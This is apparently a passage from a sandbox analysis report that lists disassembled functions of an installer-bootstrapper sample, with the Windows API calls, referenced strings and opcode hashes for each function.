                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ArgvCommandErrorLastLine
                                                                                                                                                              • String ID: apputil.cpp$ignored
                                                                                                                                                              • API String ID: 3459693003-568828354
                                                                                                                                                              • Opcode ID: cb66b542b7c53ae5f7225c1b584dc9ad8be874f32ece18e50c96602866d42e0e
                                                                                                                                                              • Instruction ID: 1bd9514eed09a4901289cf8ceace174b687efdc196d0278d4f0f1c636248c427
                                                                                                                                                              • Opcode Fuzzy Hash: cb66b542b7c53ae5f7225c1b584dc9ad8be874f32ece18e50c96602866d42e0e
                                                                                                                                                              • Instruction Fuzzy Hash: 7611907AA01129EBCB21DB99CC05E9EBBA8FF05750F4141ADBC00E7251D735DE00DAA0
                                                                                                                                                              Function 007ED1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,007ED3EE,00000000,00000000,00000000,?), ref: 007ED1C3
                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,007ED3EE,00000000,00000000,00000000,?), ref: 007ED24A
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for message data, xrefs: 007ED212
                                                                                                                                                              • NetFxChainer.cpp, xrefs: 007ED208
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                              • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                              • API String ID: 2993511968-1624333943
                                                                                                                                                              • Opcode ID: df5329993d7eac6bc8ff7b0767781c8564f5421a5cc508ba99ce487418cdda4b
                                                                                                                                                              • Instruction ID: 5200ad995f33a39a0a2593817e2c7a6cee71c3f826eec51935d8d4941e7e274a
                                                                                                                                                              • Opcode Fuzzy Hash: df5329993d7eac6bc8ff7b0767781c8564f5421a5cc508ba99ce487418cdda4b
                                                                                                                                                              • Instruction Fuzzy Hash: DD118FB1201215EFCB159F68E885E59B7F8FF49724B104168F9149B391C775AC10CBA4
                                                                                                                                                              Function 007C1F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(007C428F,007C548E,?,00000000,00000000,00000000,?,80070656,?,?,?,007DE75C,00000000,007C548E,00000000,80070656), ref: 007C1F9A
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007DE75C,00000000,007C548E,00000000,80070656,?,?,007D40BF,007C548E,?,80070656,00000001,crypt32.dll), ref: 007C1FA7
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,007DE75C,00000000,007C548E,00000000,80070656,?,?,007D40BF,007C548E), ref: 007C1FEE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 1365068426-3612885251
                                                                                                                                                              • Opcode ID: 2d43f39d750bed66eed81401e8612ebec7647501403027abba10928e8cab12fb
                                                                                                                                                              • Instruction ID: 165d90b4842e8e0ca9f352230cb14302fb96d3cf10c5f76c4da1d48f984e6164
                                                                                                                                                              • Opcode Fuzzy Hash: 2d43f39d750bed66eed81401e8612ebec7647501403027abba10928e8cab12fb
                                                                                                                                                              • Instruction Fuzzy Hash: 19015BB690112AFBDB219F94CC09EDEBBACEB05750F11416DBD14E6251E7389E009AE0
                                                                                                                                                              Function 007D0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 007D0791
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to update name and publisher., xrefs: 007D077B
                                                                                                                                                              • Failed to update resume mode., xrefs: 007D0762
                                                                                                                                                              • Failed to open registration key., xrefs: 007D0748
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                              • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                              • API String ID: 47109696-1865096027
                                                                                                                                                              • Opcode ID: 479009bdadaf52501e2c07d46f025dd079de51e090662a69ded29810c6e831be
                                                                                                                                                              • Instruction ID: d3311b5e616b1c2194da25f8a4e4014291ceafc6fa050f13b17c8cd87f80a9d0
                                                                                                                                                              • Opcode Fuzzy Hash: 479009bdadaf52501e2c07d46f025dd079de51e090662a69ded29810c6e831be
                                                                                                                                                              • Instruction Fuzzy Hash: AA015232A40628F7CF525694DC46BEEBA79EF10B30F100156F910AA250D779AE50AAD5
                                                                                                                                                              Function 00804DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(0080B500,40000000,00000001,00000000,00000002,00000080,00000000,007D04BF,00000000,?,007CF4F4,?,00000080,0080B500,00000000), ref: 00804DCB
                                                                                                                                                              • GetLastError.KERNEL32(?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00804DD8
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,007CF4F4,?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094), ref: 00804E2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 2528220319-2967768451
                                                                                                                                                              • Opcode ID: f163a9017106fa0e43ace21482aad15a1d4ee562aff6cc9bcc10041f86bb3e53
                                                                                                                                                              • Instruction ID: 03bae6041440c3c57c04770f44aae92ef896f86d17fac0444a86235af5df9993
                                                                                                                                                              • Opcode Fuzzy Hash: f163a9017106fa0e43ace21482aad15a1d4ee562aff6cc9bcc10041f86bb3e53
                                                                                                                                                              • Instruction Fuzzy Hash: 0301BC73681525ABD6725A699C0AF5B3A54FB41B71F025210FF20EA2E0E7608C1192E0
                                                                                                                                                              Function 0080497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,007E8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008049AE
                                                                                                                                                              • GetLastError.KERNEL32(?,007E8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008049BB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorFileLast
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1214770103-2967768451
                                                                                                                                                              • Opcode ID: 6699401207f3d0874e8ae392d13d136200e9b7d92722b9fe83dfe5427bddbd71
                                                                                                                                                              • Instruction ID: a072c2546d615d66c3e2c5aec88116243ce33cb66fc2391ada671dbbab50abe9
                                                                                                                                                              • Opcode Fuzzy Hash: 6699401207f3d0874e8ae392d13d136200e9b7d92722b9fe83dfe5427bddbd71
                                                                                                                                                              • Instruction Fuzzy Hash: F301D6736C1535F7E37126956C0AF6B2E58FB01B70F114225FF51EA2E0DB695D1092E0
                                                                                                                                                              Function 007E6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ControlService.ADVAPI32(007E6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,007E6AFD,00000000), ref: 007E6C13
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,007E6AFD,00000000), ref: 007E6C1D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ControlErrorLastService
                                                                                                                                                              • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                                                              • API String ID: 4114567744-2259829683
                                                                                                                                                              • Opcode ID: 8056e72ebba04c097cc5a626ab82f1fdab0b925d81b2b25c3e230500b2750b38
                                                                                                                                                              • Instruction ID: 73791c3ad9f07c03c0520d6d480f44c0cd4d00d6f72513eb9d7ded6290dd8cbc
                                                                                                                                                              • Opcode Fuzzy Hash: 8056e72ebba04c097cc5a626ab82f1fdab0b925d81b2b25c3e230500b2750b38
                                                                                                                                                              • Instruction Fuzzy Hash: 9D01FC73A41238A7D7209B659C05BAB77A4FF08760F114029FD00EB280DA289C0145E4
                                                                                                                                                              Function 008039AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008039F4
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00803A27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: 86b5e368490d30bb8d781f3b4d91db8e46fa19f8c930dccf87333753a98726ac
                                                                                                                                                              • Instruction ID: 99b51c3fc1f973270bcdfaa23fcd62e77878190efc72f10eb2066923f9495280
                                                                                                                                                              • Opcode Fuzzy Hash: 86b5e368490d30bb8d781f3b4d91db8e46fa19f8c930dccf87333753a98726ac
                                                                                                                                                              • Instruction Fuzzy Hash: FD01A235744225BBD7605A999C09F6B36DCFF42B64F110529FC44E7380D6B8CE0086A0
                                                                                                                                                              Function 00803929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0080396E
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008039A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: c7ec314dcc2c2a8bb2e89ddaf3f0e9e53509391779570b37265b8a23a57c4f2c
                                                                                                                                                              • Instruction ID: 19881f407190167532738f39a92f643f6172d5f1426adf873f8a83787f5a393d
                                                                                                                                                              • Opcode Fuzzy Hash: c7ec314dcc2c2a8bb2e89ddaf3f0e9e53509391779570b37265b8a23a57c4f2c
                                                                                                                                                              • Instruction Fuzzy Hash: 1101D631645219ABD7601A989C09F7B3BDCFF42B64F114539FD40E7380C6B4CE0096E1
                                                                                                                                                              Function 008068B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0080690F
                                                                                                                                                                • Part of subcall function 00808713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00808820
                                                                                                                                                                • Part of subcall function 00808713: GetLastError.KERNEL32 ref: 0080882A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                              • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                                                                                                                              • API String ID: 211557998-1658759192
                                                                                                                                                              • Opcode ID: 369b3660737f63ed5a04fce3aa676af6d5a09ae0b31f0c8f49fc44fd3e103778
                                                                                                                                                              • Instruction ID: 7ac44c1708a644ac22b0cb4f5d76a3d343bf916a213f90eb46c330788a5fee45
                                                                                                                                                              • Opcode Fuzzy Hash: 369b3660737f63ed5a04fce3aa676af6d5a09ae0b31f0c8f49fc44fd3e103778
                                                                                                                                                              • Instruction Fuzzy Hash: 10014FB190122AFFCB609F89DC4186AFBA8FB14765B61817AE504EB650E3715E30D6D0
                                                                                                                                                              Function 007DECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 007DECED
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DECF7
                                                                                                                                                              Strings
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DED1B
                                                                                                                                                              • Failed to post elevate message., xrefs: 007DED25
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                              • API String ID: 2609174426-4098423239
                                                                                                                                                              • Opcode ID: 5c643419fbf7340f9700238fb90286827d3f7940bf1ae07f5da9041ba8e8af3c
                                                                                                                                                              • Instruction ID: 62691cc9ed26631ec3c614843f8952de9e651f73d0dee544d4f5137747e29f03
                                                                                                                                                              • Opcode Fuzzy Hash: 5c643419fbf7340f9700238fb90286827d3f7940bf1ae07f5da9041ba8e8af3c
                                                                                                                                                              • Instruction Fuzzy Hash: D2F0FC33740231ABC73166989C09F8677A4BF00B70B214129FE14EF3C1DB29CC0186D4
                                                                                                                                                              Function 007CD8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 007CD903
                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,007C48D7,00000000,?,?,007C548E,?,?), ref: 007CD912
                                                                                                                                                              • GetLastError.KERNEL32(?,007C48D7,00000000,?,?,007C548E,?,?), ref: 007CD91C
                                                                                                                                                              Strings
                                                                                                                                                              • BootstrapperApplicationDestroy, xrefs: 007CD8FB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                              • String ID: BootstrapperApplicationDestroy
                                                                                                                                                              • API String ID: 1144718084-3186005537
                                                                                                                                                              • Opcode ID: 3d2edd6f5415265325e48f5044547eb7408ae1de8db2ab23472e3d0ae28d496b
                                                                                                                                                              • Instruction ID: 43b5df81566f54b9ebbd5c70a3f1ca197cdc187497f321b3b0bf70558e649e75
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2edd6f5415265325e48f5044547eb7408ae1de8db2ab23472e3d0ae28d496b
                                                                                                                                                              • Instruction Fuzzy Hash: E6F06236700A26ABC3304F6AD804F2AF7A8FF14B62B01823DE825D6520D775FC508BD0
                                                                                                                                                              Function 00803D80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,fT|,?,00000000,007C5466,?,?,?), ref: 00803DA7
                                                                                                                                                              • CoCreateInstance.OLE32(00000000,00000000,00000001,0082716C,?), ref: 00803DBF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFromInstanceProg
                                                                                                                                                              • String ID: Microsoft.Update.AutoUpdate$fT|
                                                                                                                                                              • API String ID: 2151042543-1826053810
                                                                                                                                                              • Opcode ID: 8b1c9970854aa26cfa14a569d033e04352b90e0179d563fe974291c0c54c1300
                                                                                                                                                              • Instruction ID: ea9e32965db420bb846812f6dddf999e2fe73bc5de00d55714d21d95b4cecdeb
                                                                                                                                                              • Opcode Fuzzy Hash: 8b1c9970854aa26cfa14a569d033e04352b90e0179d563fe974291c0c54c1300
                                                                                                                                                              • Instruction Fuzzy Hash: EDF03A71611219BBDB10EFA9ED05AAFB7BCEB09710F510065EA01E7290D671AE0486A2
                                                                                                                                                              Function 008031EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00803200
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00803230
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: b8f17a5528b2f825cba01da95a6120d5efe0926fe93ca1e3d3a0967845e73178
                                                                                                                                                              • Instruction ID: 9dbee1599c32ca551afb9efde072c644851388909a196970eddc19866a6e6769
                                                                                                                                                              • Opcode Fuzzy Hash: b8f17a5528b2f825cba01da95a6120d5efe0926fe93ca1e3d3a0967845e73178
                                                                                                                                                              • Instruction Fuzzy Hash: E8F0BE32102668EBC7310F84AC09F6B77ECFB80B62F258029FC04AB350C7758E1096E0
                                                                                                                                                              Function 00803498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008034AD
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008034DD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
